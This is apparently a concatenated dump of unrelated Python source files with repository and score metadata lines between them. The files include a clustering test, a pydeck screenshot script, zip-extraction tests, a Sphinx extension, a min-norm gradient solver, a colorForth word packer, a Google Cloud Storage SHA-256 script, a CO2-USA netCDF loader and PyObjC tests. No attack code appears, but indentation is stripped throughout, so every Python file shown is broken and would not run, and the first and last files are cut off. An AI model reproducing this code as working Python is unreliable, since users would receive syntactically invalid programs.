# hierarchical clustering
c2_elm2clu_dict = {0: [1], 1: [1], 2: [2], 3: [5], 4: [5], 5: [6, 8], 6: [9]}
c2_dag = DAG()
c2_dag.add_edges_from([(0, 1), (0, 2), (3, 4), (4, 5), (4, 6), (3, 7), (7, 8), (7, 9)])
c1 = Clustering(elm2clu_dict=c1_elm2clu_dict)
c2 = Clustering(elm2clu_dict=c2_elm2clu_dict, hier_graph=c2_dag)
known_elsim = [0.92875658, 0.92875658, 0.85751315, 0.25717544, 0.74282456, 0.82083876, 0.80767074]
elsim, ellabels = clusimelement.element_sim_elscore(c1, c2, alpha=0.9, r=1., r2=None, rescale_path_type='max')
for i in range(7):
assert_approx_equal(elsim[i], known_elsim[i], 10**(-10), "Element-centric similarity for element %s does not match. %s != %s" % (i, elsim[i], known_elsim[i]) )
if __name__ == "__main__":
test_comparison_example()
test_model_example()
test_elementsim_example()
| 2.390625 | 2 |
bindings/pydeck/examples/scripts/update_docs.py | wuweiweiwu/deck.gl | 0 | 12789314 | <gh_stars>0
import asyncio
import glob
import os
from pyppeteer import launch
here = os.path.dirname(os.path.abspath(__file__))
parent_directory = os.path.join(here, "..")
os.chdir(here)
example_glob = os.path.join(parent_directory, "*_layer.py")
async def run(cmd):
"""Runs a shell command within asyncio"""
proc = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await proc.communicate()
print(f"[info] {cmd!r} exited with {proc.returncode}")
if stdout:
print(f"[stdout]\n{stdout.decode()}")
if stderr:
print(f"[stderr]\n{stderr.decode()}")
async def main():
for fname in glob.glob(example_glob):
browser = await launch(
autoClose=False,
headless=False,
args=["--no-sandbox", "--disable-web-security"],
)
page = await browser.newPage()
print("[info] Converting %s to an image" % fname)
await run(" ".join(["python", fname]))
png_fname = os.path.splitext(fname)[0] + ".png"
html_fname = os.path.join(
here, os.path.splitext(os.path.basename(fname))[0] + ".html"
)
fpath = "file://%s" % html_fname
if "bitmap_layer" in html_fname or "icon_layer" in html_fname:
await page.goto(fpath)
await asyncio.sleep(10)
else:
await page.goto(
fpath,
waitUntil=["load", "networkidle2", "networkidle0"],
timeout=30000,
)
await page.screenshot({"path": png_fname})
print("[info] Sucessfully converted %s to a png at %s" % (fname, png_fname))
await browser.close()
if __name__ == "__main__":
asyncio.get_event_loop().run_until_complete(main())
| 2.578125 | 3 |
tests/test_recursiveDecompression.py | zomry1/Hystrix-Box | 7 | 12789315 | from HystrixBox.Tools.recursiveDecompression import extract_recursive
import filecmp
import os
TEST1 = '''File not found\n'''
TEST2 = '''Not a zip file or corrupted zip file\n'''
def compareDir(dir1, dir2):
"""
Compare two directory trees content.
Return False if they differ, True is they are the same.
"""
compared = filecmp.dircmp(dir1, dir2)
if (compared.left_only or compared.right_only or compared.diff_files
or compared.funny_files):
return False
for subdir in compared.common_dirs:
if not compareDir(os.path.join(dir1, subdir), os.path.join(dir2, subdir)):
return False
return True
def test_extract_recursive_true(tmpdir):
path = tmpdir.strpath
extract_recursive('../examples/recursivezip.zip', path)
assert compareDir(path, '../examples/RecursiveZipExtracted/')
def test_extract_recursive_1layer(tmpdir):
path = tmpdir.strpath
extract_recursive('../examples/root.zip', path)
assert compareDir(path, '../examples/RecursiveZipExtracted/1Introduction/2Introduction/3Introduction')
def test_extract_recursive_noFile(capfd, tmpdir):
path = tmpdir.strpath
extract_recursive('', path)
out, err = capfd.readouterr()
assert (out == TEST1)
def test_extract_recursive_noZipFile(capfd, tmpdir):
path = tmpdir.strpath
extract_recursive('../examples/extractor.txt', path)
out, err = capfd.readouterr()
assert (out == TEST2)
| 2.65625 | 3 |
doc/ext/genfortran.py | VACUMM/xoa | 7 | 12789316 | """Generate files to declare fortran functions"""
import os
import re
import logging
import importlib
from docutils.statemachine import string2lines
from sphinx.util.docutils import SphinxDirective
path_pat_mod_dir = os.path.join("{gendir}", "{mod_name}")
path_pat_mod_file = os.path.join(path_pat_mod_dir, "index.rst")
path_pat_func_file = os.path.join(path_pat_mod_dir, "{func_name}.rst")
def checkdir(path):
pdir = os.path.dirname(path)
if not os.path.exists(pdir):
os.makedirs(pdir)
class GenFortran(SphinxDirective):
has_content = True
def run(self):
if not self.content:
return []
# Loop on modules and descriptions
rst_toctree = ".. toctree::\n\t:hidden:\n\n"
rst_table = ".. list-table::\n\n"
for mod_name_desc in self.content:
smod = mod_name_desc.split(" ")
mod_name = smod[0]
mod_desc = " ".join(smod[1:])
rst_toctree += f"\tgenfortran/{mod_name}/index\n"
rst_table += f"\t* - :mod:`{mod_name}`\n"
rst_table += f"\t - {mod_desc}\n"
# Insert toctree and tables
rst_all = rst_toctree + "\n\n" + rst_table + "\n"
source = self.state_machine.input_lines.source(
self.lineno - self.state_machine.input_offset - 1)
include_lines = string2lines(rst_all, convert_whitespace=1)
self.state_machine.insert_input(include_lines, source)
return []
re_directive_match = re.compile(
r"^(?P<indent>\s*)\.\.\s+genfortran::\s*\n$").match
re_indent_match = re.compile(r"^(?P<indent>\s*)\S.+\n$").match
def generate_stub_files(srcdir, mod_name, mod_desc):
gendir = os.path.join(srcdir, "genfortran")
logging.info(f"Generating rst files for fortran wrapper "+mod_name)
mod_content = importlib.import_module(mod_name)
func_names = [func for func in dir(mod_content)
if not func.startswith('_')]
# Write files
mod_dir = path_pat_mod_dir.format(**locals())
if not os.path.exists(mod_dir):
os.makedirs(mod_dir)
mod_file = path_pat_mod_file.format(**locals())
with open(mod_file, "w") as f:
f.write(mod_name + "\n" + len(mod_name)*"=" + "\n\n")
f.write(mod_desc + "\n\n")
f.write(f".. module:: {mod_name}\n\n")
rst_table = ".. list-table::\n\n"
rst_toctree = ".. toctree::\n\t:hidden:\n\n"
for func_name in func_names:
rst_table += f"\t* - :func:`{mod_name}.{func_name}`\n"
func = getattr(mod_content, func_name)
func_sig = func.__doc__.split("\n")[0]
rst_table += f"\t - {func_sig}\n"
rst_toctree += f"\t{func_name}\n"
with open(path_pat_func_file.format(
**locals()), "w") as ff:
ff.write(func_name+"\n"+len(func_name)*"="+"\n\n")
ff.write(f".. currentmodule:: {mod_name}\n\n")
out, call = func_sig.split('=')
ff.write(f".. autofunction:: {call}\n\n")
f.write(rst_toctree+"\n\n")
f.write(rst_table)
def parse_and_generate(app):
"""Parse rst files to find directives and generate stub files"""
# Get file list
env = app.builder.env
srcdir = env.srcdir
if app.config.genfortran_src_files:
srcfiles = [os.path.join(srcdir, srcfile) for srcfile
in app.config.genfortran_src_files]
else:
env = app.builder.env
srcfiles = [env.doc2path(x, base=None) for x in env.found_docs
if os.path.isfile(env.doc2path(x))]
# Parse files
for srcfile in srcfiles:
if not os.path.exists(srcfile):
logging.warning("[genfortran] file not found: "+srcfile)
continue
with open(srcfile) as f:
indent = None
for line in f:
m = re_directive_match(line)
if m:
indent = m.group('indent')
continue
if indent is None:
continue
m = re.match("^"+indent + r"\s+(?P<mod_name>[\w.]+)" +
r"(?P<mod_desc>\s.*)\n$", line)
if m:
generate_stub_files(
srcdir, m.group("mod_name"),
m.group("mod_desc").strip())
continue
m = re_indent_match(line)
if m and len(m.group('indent')) <= len(indent):
indent = None
def setup(app):
app.add_directive("genfortran", GenFortran)
app.connect('builder-inited', parse_and_generate)
app.add_config_value('genfortran_src_files', [], [], [list])
return {'version': '0.1'}
| 2.421875 | 2 |
src/Methods/DataFromManyPersons/Univariate/__init__.py | syncpy/SyncPy | 20 | 12789317 | <gh_stars>10-100
"""
This package allows to compute synchronisation between monovariate signals gathered
from many persons.
"""
__all__ = ['Categorical', 'Continuous']
| 1.070313 | 1 |
mo_optimizers/min_norm_solvers.py | timodeist/multi_objective_learning | 0 | 12789318 | <reponame>timodeist/multi_objective_learning
"""
This code is taken from the repository accompanying the manuscript
Sener, Ozan, and <NAME>.
"Multi-task learning as multi-objective optimization."
arXiv preprint arXiv:1810.04650 (2018).
Neural Information Processing Systems (NeurIPS) 2018
https://github.com/intel-isl/MultiObjectiveOptimization
MIT License
Copyright (c) 2018 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import numpy as np
import torch
class MinNormSolver:
MAX_ITER = 250
STOP_CRIT = 1e-5
def _min_norm_element_from2(v1v1, v1v2, v2v2):
"""
Analytical solution for min_{c} |cx_1 + (1-c)x_2|_2^2
d is the distance (objective) optimzed
v1v1 = <x1,x1>
v1v2 = <x1,x2>
v2v2 = <x2,x2>
"""
if v1v2 >= v1v1:
# Case: Fig 1, third column
gamma = 0.999
cost = v1v1
return gamma, cost
if v1v2 >= v2v2:
# Case: Fig 1, first column
gamma = 0.001
cost = v2v2
return gamma, cost
# Case: Fig 1, second column
gamma = -1.0 * ( (v1v2 - v2v2) / (v1v1+v2v2 - 2*v1v2) )
cost = v2v2 + gamma*(v1v2 - v2v2)
return gamma, cost
def _min_norm_2d(vecs, dps):
"""
Find the minimum norm solution as combination of two points
This is correct only in 2D
ie. min_c |\sum c_i x_i|_2^2 st. \sum c_i = 1 , 1 >= c_1 >= 0 for all i, c_i + c_j = 1.0 for some i, j
"""
# computes dot products of gradient vectors and applies Algorithm 1 as shown in Sener and Koltun (2018)
dmin = 1e8
for i in range(len(vecs)):
for j in range(i+1,len(vecs)):
if (i,j) not in dps:
dps[(i, j)] = 0.0
for k in range(len(vecs[i])):
dps[(i,j)] += torch.dot(vecs[i][k], vecs[j][k]).item()#torch.dot(vecs[i][k], vecs[j][k]).data[0]
dps[(j, i)] = dps[(i, j)]
if (i,i) not in dps:
dps[(i, i)] = 0.0
for k in range(len(vecs[i])):
dps[(i,i)] += torch.dot(vecs[i][k], vecs[i][k]).item()#torch.dot(vecs[i][k], vecs[i][k]).data[0]
if (j,j) not in dps:
dps[(j, j)] = 0.0
for k in range(len(vecs[i])):
dps[(j, j)] += torch.dot(vecs[j][k], vecs[j][k]).item()#torch.dot(vecs[j][k], vecs[j][k]).data[0]
c,d = MinNormSolver._min_norm_element_from2(dps[(i,i)], dps[(i,j)], dps[(j,j)])
if d < dmin:
dmin = d
# sol contains the pair of vectors, the selected gamma weight and some cost (I dont understand why they matter)
sol = [(i,j),c,d]
return sol, dps
def _projection2simplex(y):
"""
Given y, it solves argmin_z |y-z|_2 st \sum z = 1 , 1 >= z_i >= 0 for all i
"""
m = len(y)
sorted_y = np.flip(np.sort(y), axis=0)
tmpsum = 0.0
tmax_f = (np.sum(y) - 1.0)/m
for i in range(m-1):
tmpsum+= sorted_y[i]
tmax = (tmpsum - 1)/ (i+1.0)
if tmax > sorted_y[i+1]:
tmax_f = tmax
break
return np.maximum(y - tmax_f, np.zeros(y.shape))
def _next_point(cur_val, grad, n):
proj_grad = grad - ( np.sum(grad) / n )
tm1 = -1.0*cur_val[proj_grad<0]/proj_grad[proj_grad<0]
tm2 = (1.0 - cur_val[proj_grad>0])/(proj_grad[proj_grad>0])
skippers = np.sum(tm1<1e-7) + np.sum(tm2<1e-7)
t = 1
if len(tm1[tm1>1e-7]) > 0:
t = np.min(tm1[tm1>1e-7])
if len(tm2[tm2>1e-7]) > 0:
t = min(t, np.min(tm2[tm2>1e-7]))
next_point = proj_grad*t + cur_val
next_point = MinNormSolver._projection2simplex(next_point)
return next_point
def find_min_norm_element(vecs):
"""
Given a list of vectors (vecs), this method finds the minimum norm element in the convex hull
as min |u|_2 st. u = \sum c_i vecs[i] and \sum c_i = 1.
It is quite geometric, and the main idea is the fact that if d_{ij} = min |u|_2 st u = c x_i + (1-c) x_j; the solution lies in (0, d_{i,j})
Hence, we find the best 2-task solution, and then run the projected gradient descent until convergence
"""
# Solution lying at the combination of two points
dps = {}
init_sol, dps = MinNormSolver._min_norm_2d(vecs, dps)
# n is the number of vectors fed into the functions.
# if all networks are in their assigned subregion, only the loss gradients are given as input and n is equal to the number of losses.
# if some networks are not in their assigned subregion then all loss gradients AND and gradients constraint correction \Nabla G are given as input
n=len(vecs)
sol_vec = np.zeros(n)
# init_sol[0] contains the indices of the losses for which the weight gamma (init_sol[1]) was determined so that the resulting convex combination of loss gradients (gamma * loss_grad + (1-gamma) * other_loss_grad) has minimum norm
# sol_vec contains the weights gamma and (1-gamma) in the order of the function input vecs (which is the list of loss gradients and constraint correction gradients)
sol_vec[init_sol[0][0]] = init_sol[1]
sol_vec[init_sol[0][1]] = 1 - init_sol[1]
if n < 3:
# This is optimal for n=2, so return the solution
return sol_vec , init_sol[2]
# if there are more than 2 vectors in the input, then run projected gradient descent (?)
iter_count = 0
# create matrix of dot products previously computed
grad_mat = np.zeros((n,n))
for i in range(n):
for j in range(n):
grad_mat[i,j] = dps[(i, j)]
while iter_count < MinNormSolver.MAX_ITER:
grad_dir = -1.0*np.dot(grad_mat, sol_vec)
new_point = MinNormSolver._next_point(sol_vec, grad_dir, n)
# Re-compute the inner products for line search
v1v1 = 0.0
v1v2 = 0.0
v2v2 = 0.0
for i in range(n):
for j in range(n):
v1v1 += sol_vec[i]*sol_vec[j]*dps[(i,j)]
v1v2 += sol_vec[i]*new_point[j]*dps[(i,j)]
v2v2 += new_point[i]*new_point[j]*dps[(i,j)]
nc, nd = MinNormSolver._min_norm_element_from2(v1v1, v1v2, v2v2)
new_sol_vec = nc*sol_vec + (1-nc)*new_point
change = new_sol_vec - sol_vec
if np.sum(np.abs(change)) < MinNormSolver.STOP_CRIT:
return sol_vec, nd
sol_vec = new_sol_vec
def find_min_norm_element_FW(vecs):
"""
Given a list of vectors (vecs), this method finds the minimum norm element in the convex hull
as min |u|_2 st. u = \sum c_i vecs[i] and \sum c_i = 1.
It is quite geometric, and the main idea is the fact that if d_{ij} = min |u|_2 st u = c x_i + (1-c) x_j; the solution lies in (0, d_{i,j})
Hence, we find the best 2-task solution, and then run the Frank Wolfe until convergence
"""
# Solution lying at the combination of two points
dps = {}
init_sol, dps = MinNormSolver._min_norm_2d(vecs, dps)
n=len(vecs)
sol_vec = np.zeros(n)
sol_vec[init_sol[0][0]] = init_sol[1]
sol_vec[init_sol[0][1]] = 1 - init_sol[1]
if n < 3:
# This is optimal for n=2, so return the solution
return sol_vec , init_sol[2]
iter_count = 0
grad_mat = np.zeros((n,n))
for i in range(n):
for j in range(n):
grad_mat[i,j] = dps[(i, j)]
while iter_count < MinNormSolver.MAX_ITER:
t_iter = np.argmin(np.dot(grad_mat, sol_vec))
v1v1 = np.dot(sol_vec, np.dot(grad_mat, sol_vec))
v1v2 = np.dot(sol_vec, grad_mat[:, t_iter])
v2v2 = grad_mat[t_iter, t_iter]
nc, nd = MinNormSolver._min_norm_element_from2(v1v1, v1v2, v2v2)
new_sol_vec = nc*sol_vec
new_sol_vec[t_iter] += 1 - nc
change = new_sol_vec - sol_vec
if np.sum(np.abs(change)) < MinNormSolver.STOP_CRIT:
return sol_vec, nd
sol_vec = new_sol_vec
def gradient_normalizers(grads, losses, normalization_type):
gn = {}
if normalization_type == 'l2':
for t in grads:
gn[t] = np.sqrt(np.sum([gr.pow(2).sum().data[0] for gr in grads[t]]))
elif normalization_type == 'loss':
for t in grads:
gn[t] = losses[t]
elif normalization_type == 'loss+':
for t in grads:
gn[t] = losses[t] * np.sqrt(np.sum([gr.pow(2).sum().data[0] for gr in grads[t]]))
elif normalization_type == 'none':
for t in grads:
gn[t] = 1.0
else:
print('ERROR: Invalid Normalization Type')
return gn | 1.25 | 1 |
tools/pack.py | sts-q/Einherjar | 20 | 12789319 | #!/usr/bin/env python
# Copyright (c) <NAME>.
# All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import sys
code = ' rtoeani' + 'smcylgfw' + 'dvpbhxuq' + '01234567' + \
'89j-k.z/' + ';:!+@*,?'
asm_encodings = [
'__',
'_r',
'_t',
'_o',
'_e',
'_a',
'_n',
'_i',
'_s',
'_m',
'_c',
'_y',
'_l',
'_g',
'_f',
'_w',
'_d',
'_v',
'_p',
'_b',
'_h',
'_x',
'_u',
'_q',
'_0',
'_1',
'_2',
'_3',
'_4',
'_5',
'_6',
'_7',
'_8',
'_9',
'_j',
'_dash',
'_k',
'_dot',
'_z',
'_slash',
'_semi',
'_colon',
'_store',
'_plus',
'_fetch',
'_times',
'_comma',
'_question',
]
huffman_encodings = [
0b0000, #
0b0001, #r
0b0010, #t
0b0011, #o
0b0100, #e
0b0101, #a
0b0110, #n
0b0111, #i
0b10000, #s
0b10001, #m
0b10010, #c
0b10011, #y
0b10100, #l
0b10101, #g
0b10110, #f
0b10111, #w
0b1100000, #d
0b1100001, #v
0b1100010, #p
0b1100011, #b
0b1100100, #h
0b1100101, #x
0b1100110, #u
0b1100111, #q
0b1101000, #0
0b1101001, #1
0b1101010, #2
0b1101011, #3
0b1101100, #4
0b1101101, #5
0b1101110, #6
0b1101111, #7
0b1110000, #8
0b1110001, #9
0b1110010, #j
0b1110011, #-
0b1110100, #k
0b1110101, #.
0b1110110, #z
0b1110111, #/
0b1111000, #;
0b1111001, #:
0b1111010, #!
0b1111011, #+
0b1111100, #@
0b1111101, #*
0b1111110, #,
0b1111111, #?
]
highbit = 0x80000000L
mask = 0xffffffffL
def packword_num(word):
"""pack a word into a 32-bit integer like colorForth editor does
this routine ignores anything past 28 bits"""
packed, bits = 0, 28
for letter in word:
lettercode = code.index(letter)
length = 4 + (lettercode > 7) + (2 * (lettercode > 15)) # using True as 1
lettercode += (8 * (length == 5)) + ((96 - 16) * (length == 7)) # True=1
packed = (packed << length) + lettercode
bits -= length
packed <<= bits + 4
return packed
def packword(word):
"""pack a word into a 32-bit integer like colorForth editor does
this routine ignores anything past 28 bits"""
packed, bits = 0, 28
letter_codes = []
lengths = []
for i in range(0, len(word)):
letter = word[i]
#lettercode = huffman_encodings[code.index(letter)]
lettercode = code.index(letter)
length = 4 + (lettercode > 7) + (2 * (lettercode > 15)) # using True as 1
lettercode += (8 * (length == 5)) + ((96 - 16) * (length == 7)) # True=1
letter_codes.append(lettercode)
lengths.append(length)
packed = (packed << length) + lettercode
s = sum(lengths)
if s < 32:
coded_word = "(" * (len(word) - 1) + asm_encodings[code.index(word[0])]
i = 1
while i < len(word):
letter = word[i]
coded_asm_letter = asm_encodings[code.index(letter)]
displacement_for_this_letter = lengths[i]
coded_word += "<<" + str(displacement_for_this_letter) + "|" + coded_asm_letter + ")"
i = i+1
coded_word += "<<" + str(32 - s)
if __name__ == "__main__":
word = sys.argv[1]
packword(word)
packed = packword_num(word)
print "0x%x" % packed
| 1.78125 | 2 |
scripts/sha256_gcs_blobs.py | DataBiosphere/azul | 17 | 12789320 | <gh_stars>10-100
"""
Calculate the SHA-256 of Google Cloud Storage one or more blobs and write the
result as custom metadata to each blob.
"""
import argparse
import base64
import hashlib
import logging
import os
import sys
import tempfile
from typing import (
List,
Tuple,
)
from urllib import (
parse,
)
# PyCharm doesn't seem to recognize PEP 420 namespace packages
# noinspection PyPackageRequirements
import google.cloud.storage as gcs
from azul import (
reject,
require,
)
from azul.logging import (
configure_script_logging,
)
log = logging.getLogger(__name__)
class WriteCustomMetadata:
def main(self):
self._run()
exit_code = 0
return exit_code
@classmethod
def _parse_args(cls, argv):
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--source-area', '-s',
required=True,
help='The Google Cloud Storage URL of the source area. '
'Syntax is gs://<bucket>[/<path>].')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--blob-path', '-b',
action='append',
help='The path of a blob object relative to the source area. '
'Can be specified multiple times.')
group.add_argument('--all-blobs', '-B',
action='store_true', default=False,
help='Process all blobs contained within the source area')
parser.add_argument('--force', '-f',
action='store_true', default=False,
help='Force calculation of SHA256 if blob has an existing '
'custom metadata value and overwrite if different.')
args = parser.parse_args(argv)
return args
def __init__(self, argv: List[str]) -> None:
super().__init__()
self.args = self._parse_args(argv)
self.gcs = gcs.Client()
self.src_bucket, self.src_path = self._parse_gcs_url(self.args.source_area)
def _parse_gcs_url(self, gcs_url: str) -> Tuple[gcs.Bucket, str]:
"""
Parse a GCS URL into its Bucket and path components
"""
split_url = parse.urlsplit(gcs_url)
require(split_url.scheme == 'gs' and split_url.netloc,
'Google Cloud Storage URL must be in gs://<bucket>[/<path>] format')
reject(split_url.path.endswith('/'),
'Google Cloud Storage URL must not end with a "/"')
if split_url.path:
path = split_url.path.lstrip('/') + '/'
else:
path = ''
bucket = gcs.Bucket(self.gcs, split_url.netloc)
return bucket, path
def _run(self):
"""
Process each blob path given
"""
for blob in self.iterate_blobs():
log.info('Processing %s', blob.name)
self.write_blob_sha256(blob, self.args.force)
def iterate_blobs(self):
if self.args.all_blobs:
for blob in self.src_bucket.list_blobs(prefix=self.src_path):
yield blob
else:
for blob_path in self.args.blob_path:
yield self.get_blob(blob_path)
def write_blob_sha256(self, blob: gcs.Blob, force: bool = False) -> None:
"""
Calculates a blob's SHA256 and writes the value to the blob's custom
metadata 'sha256' field.
"""
current_value = None if blob.metadata is None else blob.metadata.get('sha256')
log.info('Current SHA256 value: %s', current_value)
if current_value is None or force:
file_sha256 = self.calculate_blob_sha256(blob)
if current_value == file_sha256:
log.info('Calculated SHA256 matches current value, no change.')
else:
log.info('Saving SHA256 value: %s', file_sha256)
blob.metadata = {'sha256': file_sha256}
blob.patch()
else:
log.info('Blob SHA256 not calculated or changed.')
def get_blob(self, blob_path: str) -> gcs.Blob:
"""
Return the blob from the source bucket.
"""
return self.src_bucket.get_blob(f'{self.src_path}{blob_path}')
def calculate_blob_sha256(self,
blob: gcs.Blob) -> str:
"""
Return the SHA256 for the given blob.
To calculate the value the file is downloaded to a temporary file that
is deleted after the hash is calculated.
"""
log.info('Downloading file to calculate SHA256, size: %s bytes',
format(blob.size, ",d"))
file = tempfile.NamedTemporaryFile(mode='w+b', delete=False)
file_name = file.name
try:
blob.download_to_file(file)
finally:
file.close()
with open(file_name, 'rb') as file:
file_md5 = hashlib.md5()
file_sha256 = hashlib.sha256()
while chunk := file.read(8192):
file_md5.update(chunk)
file_sha256.update(chunk)
os.unlink(file_name)
# The MD5 hash stored in blob object metadata is base64 encoded
file_md5 = base64.b64encode(file_md5.digest()).decode()
if blob.md5_hash != file_md5:
raise Exception(f'Blob {blob.name} MD5 mismatch', blob.md5_hash, file_md5)
# Return SHA256 as 64 character hex string
return file_sha256.hexdigest()
if __name__ == '__main__':
configure_script_logging(log)
adapter = WriteCustomMetadata(sys.argv[1:])
sys.exit(adapter.main())
| 2.828125 | 3 |
CSIKit/tools/convert_json.py | FredeJ/CSIKit | 67 | 12789321 | <reponame>FredeJ/CSIKit
import json
from CSIKit.util.csitools import get_CSI
from CSIKit.reader import get_reader
def generate_json(path: str, metric: str="amplitude") -> str:
"""
This function converts a csi_trace into the json format. It works for single entry or the whole trace.
Parameters:
path (str): Path to CSI file location.
"""
def default(prop):
if "complex" in str(type(prop)):
return str(prop)
if "numpy" in str(type(prop)):
return prop.tolist()
if "__dict__" in dir(prop):
return prop.__dict__
else:
print("Prop has no __dict__ {}: \n {}".format(type(prop), prop))
reader = get_reader(path)
csi_data = reader.read_file(path)
csi_matrix, no_frames, no_subcarriers = get_CSI(csi_data, metric)
print("CSI Shape: {}".format(csi_matrix.shape))
print("Number of Frames: {}".format(no_frames))
print("Generating CSI {}...".format(metric))
json_str = json.dumps(csi_matrix, default=default, indent=True)
return json_str | 2.78125 | 3 |
co2usa_load_netCDF.py | uataq/co2usa_data_synthesis | 0 | 12789322 | # -*- coding: utf-8 -*-
"""
co2usa_load_netCDF: Load the CO2-USA Data Synthesis files from netCDF
USAGE:
The CO2-USA synthesis data is available to download from the ORNL DAAC:
https://doi.org/10.3334/ORNLDAAC/1743
To download the data, first sign into your account (or create one if you don't have one).
Next, click on "Download Data" to download the entire data set in a zip file.
Extract the netCDF files to a folder on your computer.
The CO2-USA synthesis data files should be all saved in a single directory:
/co2_usa_netCDF_files/[netCDF_files.nc]
For example, for the CO2 data file for a Boston site would be:
/co2_usa_netCDF_files/boston_co2_HF_29m_1_hour_R0_2020-09-28.nc
Set the following variables:
city: String of CO2-USA city. Example:
city = 'boston'
species: String with target species. Example:
species = 'co2'
read_folder: Path to the directory where you saved the data files. Example:
current_folder = os.getcwd()
read_folder = current_folder+'\\netCDF_formatted_files\\'
The data is in the 'co2usa' variable.
For more information, visit the CO2-USA GitHub repository:
https://github.com/loganemitchell/co2usa_data_synthesis
Written by <NAME> (<EMAIL>)
University of Utah
Last updated: 2021-06-09
"""
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import os
import glob
import netCDF4 as nc
#%% Executed this manually to enable interactive figures:
#%matplotlib qt
#%%
current_folder = os.getcwd()
read_folder = current_folder+'\\gcloud.utah.edu\\data\\co2-usa\\synthesis_output_ornl_new\\netCDF_formatted_files\\'
co2usa = {}
city = 'boston'
species = 'co2'
co2usa[city] = {}
all_files = glob.glob(read_folder+city+'_'+species+'*.nc')
for fni in range(len(all_files)):
#print('Loading '+all_files[fni])
nc_dat = nc.Dataset(all_files[fni])
site = all_files[fni][len(read_folder):all_files[fni].find('_1_hour')]
co2usa[city][site] = {}
co2usa[city][site]['global_attributes'] = {} # Site global attributes
for name in nc_dat.ncattrs():
co2usa[city][site]['global_attributes'][name] = getattr(nc_dat, name)
#print("Global attr {} = {}".format(name, getattr(nc_dat, name)))
co2usa[city][site]['attributes'] = {} # Variable attributes
for name in nc_dat.variables.keys():
co2usa[city][site]['attributes'][name] = {}
for attrname in nc_dat.variables[name].ncattrs():
co2usa[city][site]['attributes'][name][attrname] = getattr(nc_dat.variables[name], attrname)
#print("{} -- {}".format(attrname, getattr(nc_dat.variables[name], attrname)))
for name in nc_dat.variables.keys(): # Variable data
co2usa[city][site][name] = nc_dat.variables[name][:].data
# Convert to datetime
co2usa[city][site]['time'] = pd.to_datetime(co2usa[city][site]['time']*1e9)
# Take care of NaNs
co2usa[city][site][species][co2usa[city][site][species]==co2usa[city][site]['attributes'][species]['_FillValue']] = np.nan
# Remove the temporary netCDF variable
del nc_dat
#%% Plot the CO2 USA data
sites = co2usa[city].keys()
f1 = plt.figure(1); f1 = plt.clf(); ax = plt.axes(f1)
plt.title(city+' '+species,fontsize=20)
for site in sites:
if site.find('background') == -1:
plt.plot(co2usa[city][site]['time'],co2usa[city][site][species],label=site)
for site in sites:
if site.find('background') != -1:
plt.plot(co2usa[city][site]['time'],co2usa[city][site][species],'k-',label=site)
ax.set_ylabel(species,fontsize=15)
plt.legend(fontsize=14)
plt.grid(b=True,axis='both')
plt.show()
| 2.828125 | 3 |
PyObjCTest/test_nsbitmapimagerep.py | Khan/pyobjc-framework-Cocoa | 132 | 12789323 | <reponame>Khan/pyobjc-framework-Cocoa
from PyObjCTools.TestSupport import *
import objc
import array
import sys
from objc import YES, NO
from AppKit import *
try:
unicode
except NameError:
unicode = str
try:
long
except NameError:
long = int
class TestNSBitmapImageRep(TestCase):
def testInstantiation(self):
# widthxheight RGB 24bpp image
width = 256
height = 256
dataPlanes = (None, None, None, None, None)
dataPlanes = None
i1 = NSBitmapImageRep.alloc().initWithBitmapDataPlanes_pixelsWide_pixelsHigh_bitsPerSample_samplesPerPixel_hasAlpha_isPlanar_colorSpaceName_bytesPerRow_bitsPerPixel_(dataPlanes, width, height, 8, 3, NO, NO, NSDeviceRGBColorSpace, 0, 0)
self.assertTrue(i1)
i2 = NSBitmapImageRep.alloc().initWithBitmapDataPlanes_pixelsWide_pixelsHigh_bitsPerSample_samplesPerPixel_hasAlpha_isPlanar_colorSpaceName_bytesPerRow_bitsPerPixel_(None, width, height, 8, 3, NO, NO, NSDeviceRGBColorSpace, 0, 0)
self.assertTrue(i2)
def testPixelFormat(self):
width = 16
height = 16
i1 = NSBitmapImageRep.alloc().initWithBitmapDataPlanes_pixelsWide_pixelsHigh_bitsPerSample_samplesPerPixel_hasAlpha_isPlanar_colorSpaceName_bitmapFormat_bytesPerRow_bitsPerPixel_(None, width, height, 8, 3, NO, NO, NSDeviceRGBColorSpace, NSAlphaFirstBitmapFormat, 0, 0)
self.assertIsInstance(i1, NSBitmapImageRep)
singlePlane = objc.allocateBuffer(width*height*4)
for i in range(0, width*height):
si = i * 4
singlePlane[si] = 1
singlePlane[si+1] = 2
singlePlane[si+2] = 3
singlePlane[si+3] = 4
dataPlanes = (singlePlane, None, None, None, None)
# test non-planar, premade buffer
i2 = NSBitmapImageRep.alloc().initWithBitmapDataPlanes_pixelsWide_pixelsHigh_bitsPerSample_samplesPerPixel_hasAlpha_isPlanar_colorSpaceName_bitmapFormat_bytesPerRow_bitsPerPixel_(dataPlanes, width, height, 8, 3, NO, NO, NSDeviceRGBColorSpace, NSAlphaFirstBitmapFormat, 0, 0)
self.assertIsInstance(i2, NSBitmapImageRep)
bitmapData = i2.bitmapData()
self.assertEqual(len(bitmapData), width * height * 4)
def testImageData(self):
width = 256
height = 256
rPlane = array.array('B')
rPlane.fromlist( [y%256 for y in range(0,height) for x in range(0,width)] )
if sys.version_info[0] == 3:
buffer = memoryview
else:
from __builtin__ import buffer
